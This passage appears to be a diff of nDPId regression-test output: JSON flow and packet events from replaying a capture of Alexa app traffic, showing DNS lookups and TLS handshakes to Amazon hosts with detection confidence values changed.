{"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1490976029753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1490976029753,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw0QhAAEARvHqsECoBrBAq2AA1Tf8AXGjL5quBgAABAAIAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQABwAwABQABAAACoQAOBG1hZHMGYW1hem9uwCHANgABAAEAAAAGAAQ0XugA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976029753,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976029753,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029756,"flow_last_seen":1490976029756,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029756,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1490976029756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029756,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YepAAEAG5YqsECrYNF7oAIMUAbsV\/ygFAAAAAKAC\/\/9G\/wAAAgQFtAQCCAoA9knvAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1490976029858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976029858,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9PhAAOcGq4c0XugArBAq2AG7gxTPTpIKFf8oBnASH\/5MlgAAAgQFtAEDAwY="} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1490976029859,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976029859,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYetAAEAG5Z2sECrYNF7oAIMUAbsV\/ygGz06SC1AQAVeXBwAA"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1490976030681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1490976030681,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWlBAAEARM1+sECrYrBAqARy+ADUAMIK\/xAMBAAABAAAAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAQ=="} 
-00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1490976030758,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1490976030758,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQalIAAEABYqGsECoBrBAq2AUBAe6sECoqRQAANMRJQAA\/Bpp3rBAq2DRV0cXXygG707KdlouELZKAEAGm9GwAAAEBCAoA9kpTbQnnbg=="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1490976030890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1490976030890,"pkt":"ePiC0\/vCAMDKkaPvCABFAABU0XFAAEARvC2sECoBrBAq2AA1HL4AQPRGxAOBgAABAAEAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAABwABDbvFrk="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976030890,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.22.185"}} 
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976030890,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.22.185"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030894,"flow_last_seen":1490976030894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976030894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1490976030894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976030894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8J69AAEAG7nysECrYNu8WudGyAbvyuG3OAAAAAKAC\/\/+kIgAAAgQFtAQCCAoA9kphAAAAAAEDAwg="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1490976031102,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031102,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwN3JAAOcGN8U27xa5rBAq2AG70bLD2Mra8rhtz3ASH\/580QAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1490976031103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031103,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJ7BAAEAG7o+sECrYNu8WudGyAbvyuG3Pw9jK21AQAVfHQgAA"} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1490976031581,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976031581,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WlFAAEARM2SsECrYrBAqAaBGADUAKk94StwBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 
